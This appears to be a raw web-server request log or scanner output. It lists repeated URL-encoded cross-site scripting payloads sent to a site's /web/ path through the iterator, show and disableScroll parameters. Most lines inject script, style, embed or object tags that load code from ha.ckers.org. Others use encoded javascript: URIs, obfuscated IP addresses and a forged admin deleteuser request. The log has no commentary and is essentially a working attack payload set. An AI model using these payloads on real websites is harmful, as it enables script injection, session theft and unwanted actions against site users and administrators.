/web/?iterator=%3CA+HREF%3D%22%2F%2Fgoogle%22%3EXSS%3C%2FA%3E
/web/?iterator=%3CLAYER+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FLAYER%3E
/web/?iterator=%3CLAYER+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FLAYER%3E
/web/?iterator=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E
/web/?iterator=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E
/web/?iterator=%3CMETA+HTTP-EQUIV%3D%22refresh%22+CONTENT%3D%220%3Burl%3Ddata%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%22%3E
/web/?iterator=%3CMETA+HTTP-EQUIV%3D%22refresh%22+CONTENT%3D%220%3Burl%3Ddata%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%22%3E
/web/?iterator=%3CA+HREF%3D%22http%3A%2F%2F0102.0146.0007.00000223%2F%22%3EXSS%3C%2FA%3E
/web/?iterator=%3CA+HREF%3D%22http%3A%2F%2F0102.0146.0007.00000223%2F%22%3EXSS%3C%2FA%3E
/web/?iterator=%3CIMG+SRC%3D%22mocha%3A%5Bcode%5D%22%3E
/web/?iterator=%3CIMG+SRC%3D%22mocha%3A%5Bcode%5D%22%3E
/web/?iterator=%3CA+HREF%3D%22http%3A%2F%2F%2577%2577%2577%252E%2567%256F%256F%2567%256C%2565%252E%2563%256F%256D%22%3EXSS%3C%2FA%3E
/web/?iterator=%3CA+HREF%3D%22http%3A%2F%2F%2577%2577%2577%252E%2567%256F%256F%2567%256C%2565%252E%2563%256F%256D%22%3EXSS%3C%2FA%3E
/web/?show=%3CSTYLE%3EBODY%7B-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29%7D%3C%2FSTYLE%3E
/web/?show=%3CSTYLE%3EBODY%7B-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29%7D%3C%2FSTYLE%3E
/web/?show=%3COBJECT+TYPE%3D%22text%2Fx-scriptlet%22+DATA%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FOBJECT%3E
/web/?show=%3COBJECT+TYPE%3D%22text%2Fx-scriptlet%22+DATA%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FOBJECT%3E
/web/?show=%3CLINK+REL%3D%22stylesheet%22+HREF%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.css%22%3E
/web/?show=%3CLINK+REL%3D%22stylesheet%22+HREF%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.css%22%3E
/web/?show=%3CMETA+HTTP-EQUIV%3D%22Link%22+Content%3D%22%3Chttp%3A%2F%2Fha.ckers.org%2Fxss.css%3E%3B+REL%3Dstylesheet%22%3E
/web/?show=%3CMETA+HTTP-EQUIV%3D%22Link%22+Content%3D%22%3Chttp%3A%2F%2Fha.ckers.org%2Fxss.css%3E%3B+REL%3Dstylesheet%22%3E
/web/?show=%3CSTYLE%3E%40import%27http%3A%2F%2Fha.ckers.org%2Fxss.css%27%3B%3C%2FSTYLE%3E
/web/?show=%3CSTYLE%3E%40import%27http%3A%2F%2Fha.ckers.org%2Fxss.css%27%3B%3C%2FSTYLE%3E
/web/?show=%3CEMBED+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.swf%22+AllowScriptAccess%3D%22always%22%3E%3C%2FEMBED%3E
/web/?show=%3CEMBED+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.swf%22+AllowScriptAccess%3D%22always%22%3E%3C%2FEMBED%3E
/web/?show=%3CSCRIPT+SRC%3D%2F%2Fha.ckers.org%2F.j%3E
/web/?show=%3CSCRIPT+SRC%3D%2F%2Fha.ckers.org%2F.j%3E
/web/?show=%3CXSS+STYLE%3D%22behavior%3A+url%28http%3A%2F%2Fha.ckers.org%2Fxss.htc%29%3B%22%3E
/web/?show=%3CXSS+STYLE%3D%22behavior%3A+url%28http%3A%2F%2Fha.ckers.org%2Fxss.htc%29%3B%22%3E
/web/?show=%3CIMG+SRC%3D%22livescript%3A%5Bcode%5D%22%3E
/web/?show=%3CIMG+SRC%3D%22livescript%3A%5Bcode%5D%22%3E
/web/?show=Redirect+302+%2Fa.jpg+http%3A%2F%2Fvictimsite.com%2Fadmin.asp%26deleteuser
/web/?show=Redirect+302+%2Fa.jpg+http%3A%2F%2Fvictimsite.com%2Fadmin.asp%26deleteuser
/web/?show=%3CA+HREF%3D%22http%3A%2F%2F0x42.0x0000066.0x7.0x93%2F%22%3EXSS%3C%2FA%3E
/web/?show=%3CA+HREF%3D%22http%3A%2F%2F0x42.0x0000066.0x7.0x93%2F%22%3EXSS%3C%2FA%3E
/web/?show=%3CIMG+SRC%3D%22http%3A%2F%2Fwww.thesiteyouareon.com%2Fsomecommand.php%3Fsomevariables%3Dmaliciouscode%22%3E
/web/?show=%3CIMG+SRC%3D%22http%3A%2F%2Fwww.thesiteyouareon.com%2Fsomecommand.php%3Fsomevariables%3Dmaliciouscode%22%3E
/web/?show=%3CIMG+SRC%3D%27vbscript%3Amsgbox%28%22XSS%22%29%27%3E
/web/?show=%3CIMG+SRC%3D%27vbscript%3Amsgbox%28%22XSS%22%29%27%3E
/web/?show=%3CIFRAME+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fscriptlet.html+%3C
/web/?show=%3CIFRAME+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fscriptlet.html+%3C
/web/?show=%3C+%253C+%26lt+%26lt%3B+%26LT+%26LT%3B+%26%2360+%26%23060+%26%230060+%26%2300060+%26%23000060+%26%230000060+%26%2360%3B+%26%23060%3B+%26%230060%3B+%26%2300060%3B+%26%23000060%3B+%26%230000060%3B+%26%23x3c+%26%23x03c+%26%23x003c+%26%23x0003c+%26%23x00003c+%26%23x000003c+%26%23x3c%3B+%26%23x03c%3B+%26%23x003c%3B+%26%23x0003c%3B+%26%23x00003c%3B+%26%23x000003c%3B+%26%23X3c+%26%23X03c+%26%23X003c+%26%23X0003c+%26%23X00003c+%26%23X000003c+%26%23X3c%3B+%26%23X03c%3B+%26%23X003c%3B+%26%23X0003c%3B+%26%23X00003c%3B+%26%23X000003c%3B+%26%23x3C+%26%23x03C+%26%23x003C+%26%23x0003C+%26%23x00003C+%26%23x000003C+%26%23x3C%3B+%26%23x03C%3B+%26%23x003C%3B+%26%23x0003C%3B+%26%23x00003C%3B+%26%23x000003C%3B+%26%23X3C+%26%23X03C+%26%23X003C+%26%23X0003C+%26%23X00003C+%26%23X000003C+%26%23X3C%3B+%26%23X03C%3B+%26%23X003C%3B+%26%23X0003C%3B+%26%23X00003C%3B+%26%23X000003C%3B+%5Cx3c+%5Cx3C+%5Cu003c+%5Cu003C
/web/?show=%3C+%253C+%26lt+%26lt%3B+%26LT+%26LT%3B+%26%2360+%26%23060+%26%230060+%26%2300060+%26%23000060+%26%230000060+%26%2360%3B+%26%23060%3B+%26%230060%3B+%26%2300060%3B+%26%23000060%3B+%26%230000060%3B+%26%23x3c+%26%23x03c+%26%23x003c+%26%23x0003c+%26%23x00003c+%26%23x000003c+%26%23x3c%3B+%26%23x03c%3B+%26%23x003c%3B+%26%23x0003c%3B+%26%23x00003c%3B+%26%23x000003c%3B+%26%23X3c+%26%23X03c+%26%23X003c+%26%23X0003c+%26%23X00003c+%26%23X000003c+%26%23X3c%3B+%26%23X03c%3B+%26%23X003c%3B+%26%23X0003c%3B+%26%23X00003c%3B+%26%23X000003c%3B+%26%23x3C+%26%23x03C+%26%23x003C+%26%23x0003C+%26%23x00003C+%26%23x000003C+%26%23x3C%3B+%26%23x03C%3B+%26%23x003C%3B+%26%23x0003C%3B+%26%23x00003C%3B+%26%23x000003C%3B+%26%23X3C+%26%23X03C+%26%23X003C+%26%23X0003C+%26%23X00003C+%26%23X000003C+%26%23X3C%3B+%26%23X03C%3B+%26%23X003C%3B+%26%23X0003C%3B+%26%23X00003C%3B+%26%23X000003C%3B+%5Cx3c+%5Cx3C+%5Cu003c+%5Cu003C
/web/?show=%3CA+HREF%3D%22h+tt+p%3A%2F%2F6%26%2309%3B6.000146.0x7.147%2F%22%3EXSS%3C%2FA%3E
/web/?show=%3CA+HREF%3D%22h+tt+p%3A%2F%2F6%26%2309%3B6.000146.0x7.147%2F%22%3EXSS%3C%2FA%3E
/web/?show=%3CIMG+SRC%3D%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3E
/web/?show=%3CIMG+SRC%3D%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3E
/web/?show=%3CA+HREF%3D%22%2F%2Fwww.google.com%2F%22%3EXSS%3C%2FA%3E
/web/?show=%3CA+HREF%3D%22%2F%2Fwww.google.com%2F%22%3EXSS%3C%2FA%3E
/web/?show=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E
/web/?show=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E
/web/?show=%3CXML+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxsstest.xml%22+ID%3DI%3E%3C%2FXML%3E+%3CSPAN+DATASRC%3D%23I+DATAFLD%3DC+DATAFORMATAS%3DHTML%3E%3C%2FSPAN%3E
/web/?show=%3CXML+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxsstest.xml%22+ID%3DI%3E%3C%2FXML%3E+%3CSPAN+DATASRC%3D%23I+DATAFLD%3DC+DATAFORMATAS%3DHTML%3E%3C%2FSPAN%3E
/web/?show=%3CHTML+xmlns%3Axss%3E+%3C%3Fimport+namespace%3D%22xss%22+implementation%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.htc%22%3E+%3Cxss%3Axss%3EXSS%3C%2Fxss%3Axss%3E+%3C%2FHTML%3E
/web/?show=%3CHTML+xmlns%3Axss%3E+%3C%3Fimport+namespace%3D%22xss%22+implementation%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.htc%22%3E+%3Cxss%3Axss%3EXSS%3C%2Fxss%3Axss%3E+%3C%2FHTML%3E
/web/?show=%3CA+HREF%3D%22http%3A%2F%2Fgoogle%3Aha.ckers.org%22%3EXSS%3C%2FA%3E
/web/?show=%3CA+HREF%3D%22http%3A%2F%2Fgoogle%3Aha.ckers.org%22%3EXSS%3C%2FA%3E
/web/?show=%3CA+HREF%3D%22http%3A%2F%2F1113982867%2F%22%3EXSS%3C%2FA%3E
/web/?show=%3CA+HREF%3D%22http%3A%2F%2F1113982867%2F%22%3EXSS%3C%2FA%3E
/web/?show=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?show=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?show=%27%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D
/web/?show=%27%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D
/web/?show=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?show=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?show=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?show=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?show=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?show=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?show=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?show=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?show=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?show=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?show=%3CIMG+SRC+%3D+%22+j+a+v+a+s+c+r+i+p+t+%3A+a+l+e+r+t+%28+%27+X+S+S+%27+%29+%22+%3E
/web/?show=%3CIMG+SRC+%3D+%22+j+a+v+a+s+c+r+i+p+t+%3A+a+l+e+r+t+%28+%27+X+S+S+%27+%29+%22+%3E
/web/?show=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js
/web/?show=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js
/web/?show=%3CA+HREF%3D%22http%3A%2F%2Fwww.gohttp%3A%2F%2Fwww.google.com%2Fogle.com%2F%22%3EXSS%3C%2FA%3E
/web/?show=%3CA+HREF%3D%22http%3A%2F%2Fwww.gohttp%3A%2F%2Fwww.google.com%2Fogle.com%2F%22%3EXSS%3C%2FA%3E
/web/?show=%3CA+HREF%3D%22http%3A%2F%2Fwww.google.com.%2F%22%3EXSS%3C%2FA%3E
/web/?show=%3CA+HREF%3D%22http%3A%2F%2Fwww.google.com.%2F%22%3EXSS%3C%2FA%3E
/web/?show=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?show=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?show=%3CA+HREF%3D%22http%3A%2F%2Fgoogle.com%2F%22%3EXSS%3C%2FA%3E
/web/?show=%3CA+HREF%3D%22http%3A%2F%2Fgoogle.com%2F%22%3EXSS%3C%2FA%3E
/web/wp-cron.php?doing_wp_cron=1644498907.6716599464416503906250
/web/?show=%3CA+HREF%3D%22http%3A%2F%2Fha.ckers.org%40google%22%3EXSS%3C%2FA%3E
/web/?show=%3CA+HREF%3D%22http%3A%2F%2Fha.ckers.org%40google%22%3EXSS%3C%2FA%3E
/web/?show=%3CA+HREF%3D%22%2F%2Fgoogle%22%3EXSS%3C%2FA%3E
/web/?show=%3CA+HREF%3D%22%2F%2Fgoogle%22%3EXSS%3C%2FA%3E
/web/?show=%3CLAYER+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FLAYER%3E
/web/?show=%3CLAYER+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FLAYER%3E
/web/?show=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E
/web/?show=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E
/web/?show=%3CMETA+HTTP-EQUIV%3D%22refresh%22+CONTENT%3D%220%3Burl%3Ddata%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%22%3E
/web/?show=%3CMETA+HTTP-EQUIV%3D%22refresh%22+CONTENT%3D%220%3Burl%3Ddata%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%22%3E
/web/?show=%3CA+HREF%3D%22http%3A%2F%2F0102.0146.0007.00000223%2F%22%3EXSS%3C%2FA%3E
/web/?show=%3CA+HREF%3D%22http%3A%2F%2F0102.0146.0007.00000223%2F%22%3EXSS%3C%2FA%3E
/web/?show=%3CIMG+SRC%3D%22mocha%3A%5Bcode%5D%22%3E
/web/?show=%3CIMG+SRC%3D%22mocha%3A%5Bcode%5D%22%3E
/web/?show=%3CA+HREF%3D%22http%3A%2F%2F%2577%2577%2577%252E%2567%256F%256F%2567%256C%2565%252E%2563%256F%256D%22%3EXSS%3C%2FA%3E
/web/?show=%3CA+HREF%3D%22http%3A%2F%2F%2577%2577%2577%252E%2567%256F%256F%2567%256C%2565%252E%2563%256F%256D%22%3EXSS%3C%2FA%3E
/web/?disableScroll=%3CSTYLE%3EBODY%7B-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29%7D%3C%2FSTYLE%3E
/web/?disableScroll=%3CSTYLE%3EBODY%7B-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29%7D%3C%2FSTYLE%3E
/web/?disableScroll=%3COBJECT+TYPE%3D%22text%2Fx-scriptlet%22+DATA%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FOBJECT%3E
/web/?disableScroll=%3COBJECT+TYPE%3D%22text%2Fx-scriptlet%22+DATA%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FOBJECT%3E
/web/?disableScroll=%3CLINK+REL%3D%22stylesheet%22+HREF%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.css%22%3E
/web/?disableScroll=%3CLINK+REL%3D%22stylesheet%22+HREF%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.css%22%3E
/web/?disableScroll=%3CMETA+HTTP-EQUIV%3D%22Link%22+Content%3D%22%3Chttp%3A%2F%2Fha.ckers.org%2Fxss.css%3E%3B+REL%3Dstylesheet%22%3E
/web/?disableScroll=%3CMETA+HTTP-EQUIV%3D%22Link%22+Content%3D%22%3Chttp%3A%2F%2Fha.ckers.org%2Fxss.css%3E%3B+REL%3Dstylesheet%22%3E
/web/?disableScroll=%3CSTYLE%3E%40import%27http%3A%2F%2Fha.ckers.org%2Fxss.css%27%3B%3C%2FSTYLE%3E
/web/?disableScroll=%3CSTYLE%3E%40import%27http%3A%2F%2Fha.ckers.org%2Fxss.css%27%3B%3C%2FSTYLE%3E
/web/?disableScroll=%3CEMBED+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.swf%22+AllowScriptAccess%3D%22always%22%3E%3C%2FEMBED%3E
/web/?disableScroll=%3CEMBED+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.swf%22+AllowScriptAccess%3D%22always%22%3E%3C%2FEMBED%3E
/web/?disableScroll=%3CSCRIPT+SRC%3D%2F%2Fha.ckers.org%2F.j%3E
/web/?disableScroll=%3CSCRIPT+SRC%3D%2F%2Fha.ckers.org%2F.j%3E
/web/?disableScroll=%3CXSS+STYLE%3D%22behavior%3A+url%28http%3A%2F%2Fha.ckers.org%2Fxss.htc%29%3B%22%3E
/web/?disableScroll=%3CXSS+STYLE%3D%22behavior%3A+url%28http%3A%2F%2Fha.ckers.org%2Fxss.htc%29%3B%22%3E
/web/?disableScroll=%3CIMG+SRC%3D%22livescript%3A%5Bcode%5D%22%3E
/web/?disableScroll=%3CIMG+SRC%3D%22livescript%3A%5Bcode%5D%22%3E
/web/?disableScroll=Redirect+302+%2Fa.jpg+http%3A%2F%2Fvictimsite.com%2Fadmin.asp%26deleteuser
/web/?disableScroll=Redirect+302+%2Fa.jpg+http%3A%2F%2Fvictimsite.com%2Fadmin.asp%26deleteuser
/web/?disableScroll=%3CA+HREF%3D%22http%3A%2F%2F0x42.0x0000066.0x7.0x93%2F%22%3EXSS%3C%2FA%3E
/web/?disableScroll=%3CA+HREF%3D%22http%3A%2F%2F0x42.0x0000066.0x7.0x93%2F%22%3EXSS%3C%2FA%3E
/web/?disableScroll=%3CIMG+SRC%3D%22http%3A%2F%2Fwww.thesiteyouareon.com%2Fsomecommand.php%3Fsomevariables%3Dmaliciouscode%22%3E
/web/?disableScroll=%3CIMG+SRC%3D%22http%3A%2F%2Fwww.thesiteyouareon.com%2Fsomecommand.php%3Fsomevariables%3Dmaliciouscode%22%3E
/web/?disableScroll=%3CIMG+SRC%3D%27vbscript%3Amsgbox%28%22XSS%22%29%27%3E
/web/?disableScroll=%3CIMG+SRC%3D%27vbscript%3Amsgbox%28%22XSS%22%29%27%3E
/web/?disableScroll=%3CIFRAME+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fscriptlet.html+%3C
/web/?disableScroll=%3CIFRAME+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fscriptlet.html+%3C
/web/?disableScroll=%3C+%253C+%26lt+%26lt%3B+%26LT+%26LT%3B+%26%2360+%26%23060+%26%230060+%26%2300060+%26%23000060+%26%230000060+%26%2360%3B+%26%23060%3B+%26%230060%3B+%26%2300060%3B+%26%23000060%3B+%26%230000060%3B+%26%23x3c+%26%23x03c+%26%23x003c+%26%23x0003c+%26%23x00003c+%26%23x000003c+%26%23x3c%3B+%26%23x03c%3B+%26%23x003c%3B+%26%23x0003c%3B+%26%23x00003c%3B+%26%23x000003c%3B+%26%23X3c+%26%23X03c+%26%23X003c+%26%23X0003c+%26%23X00003c+%26%23X000003c+%26%23X3c%3B+%26%23X03c%3B+%26%23X003c%3B+%26%23X0003c%3B+%26%23X00003c%3B+%26%23X000003c%3B+%26%23x3C+%26%23x03C+%26%23x003C+%26%23x0003C+%26%23x00003C+%26%23x000003C+%26%23x3C%3B+%26%23x03C%3B+%26%23x003C%3B+%26%23x0003C%3B+%26%23x00003C%3B+%26%23x000003C%3B+%26%23X3C+%26%23X03C+%26%23X003C+%26%23X0003C+%26%23X00003C+%26%23X000003C+%26%23X3C%3B+%26%23X03C%3B+%26%23X003C%3B+%26%23X0003C%3B+%26%23X00003C%3B+%26%23X000003C%3B+%5Cx3c+%5Cx3C+%5Cu003c+%5Cu003C
/web/?disableScroll=%3C+%253C+%26lt+%26lt%3B+%26LT+%26LT%3B+%26%2360+%26%23060+%26%230060+%26%2300060+%26%23000060+%26%230000060+%26%2360%3B+%26%23060%3B+%26%230060%3B+%26%2300060%3B+%26%23000060%3B+%26%230000060%3B+%26%23x3c+%26%23x03c+%26%23x003c+%26%23x0003c+%26%23x00003c+%26%23x000003c+%26%23x3c%3B+%26%23x03c%3B+%26%23x003c%3B+%26%23x0003c%3B+%26%23x00003c%3B+%26%23x000003c%3B+%26%23X3c+%26%23X03c+%26%23X003c+%26%23X0003c+%26%23X00003c+%26%23X000003c+%26%23X3c%3B+%26%23X03c%3B+%26%23X003c%3B+%26%23X0003c%3B+%26%23X00003c%3B+%26%23X000003c%3B+%26%23x3C+%26%23x03C+%26%23x003C+%26%23x0003C+%26%23x00003C+%26%23x000003C+%26%23x3C%3B+%26%23x03C%3B+%26%23x003C%3B+%26%23x0003C%3B+%26%23x00003C%3B+%26%23x000003C%3B+%26%23X3C+%26%23X03C+%26%23X003C+%26%23X0003C+%26%23X00003C+%26%23X000003C+%26%23X3C%3B+%26%23X03C%3B+%26%23X003C%3B+%26%23X0003C%3B+%26%23X00003C%3B+%26%23X000003C%3B+%5Cx3c+%5Cx3C+%5Cu003c+%5Cu003C
/web/?disableScroll=%3CA+HREF%3D%22h+tt+p%3A%2F%2F6%26%2309%3B6.000146.0x7.147%2F%22%3EXSS%3C%2FA%3E
/web/?disableScroll=%3CA+HREF%3D%22h+tt+p%3A%2F%2F6%26%2309%3B6.000146.0x7.147%2F%22%3EXSS%3C%2FA%3E
/web/?disableScroll=%3CIMG+SRC%3D%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3E
/web/?disableScroll=%3CIMG+SRC%3D%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3E
/web/?disableScroll=%3CA+HREF%3D%22%2F%2Fwww.google.com%2F%22%3EXSS%3C%2FA%3E
/web/?disableScroll=%3CA+HREF%3D%22%2F%2Fwww.google.com%2F%22%3EXSS%3C%2FA%3E
/web/?disableScroll=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E
/web/?disableScroll=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E
/web/?disableScroll=%3CXML+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxsstest.xml%22+ID%3DI%3E%3C%2FXML%3E+%3CSPAN+DATASRC%3D%23I+DATAFLD%3DC+DATAFORMATAS%3DHTML%3E%3C%2FSPAN%3E
/web/?disableScroll=%3CXML+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxsstest.xml%22+ID%3DI%3E%3C%2FXML%3E+%3CSPAN+DATASRC%3D%23I+DATAFLD%3DC+DATAFORMATAS%3DHTML%3E%3C%2FSPAN%3E
/web/?disableScroll=%3CHTML+xmlns%3Axss%3E+%3C%3Fimport+namespace%3D%22xss%22+implementation%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.htc%22%3E+%3Cxss%3Axss%3EXSS%3C%2Fxss%3Axss%3E+%3C%2FHTML%3E
/web/?disableScroll=%3CHTML+xmlns%3Axss%3E+%3C%3Fimport+namespace%3D%22xss%22+implementation%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.htc%22%3E+%3Cxss%3Axss%3EXSS%3C%2Fxss%3Axss%3E+%3C%2FHTML%3E
/web/?disableScroll=%3CA+HREF%3D%22http%3A%2F%2Fgoogle%3Aha.ckers.org%22%3EXSS%3C%2FA%3E
/web/?disableScroll=%3CA+HREF%3D%22http%3A%2F%2Fgoogle%3Aha.ckers.org%22%3EXSS%3C%2FA%3E
/web/?disableScroll=%3CA+HREF%3D%22http%3A%2F%2F1113982867%2F%22%3EXSS%3C%2FA%3E
/web/?disableScroll=%3CA+HREF%3D%22http%3A%2F%2F1113982867%2F%22%3EXSS%3C%2FA%3E
/web/?disableScroll=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?disableScroll=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?disableScroll=%27%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D
/web/?disableScroll=%27%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D
/web/?disableScroll=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?disableScroll=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?disableScroll=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?disableScroll=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?disableScroll=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?disableScroll=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?disableScroll=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?disableScroll=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?disableScroll=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?disableScroll=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
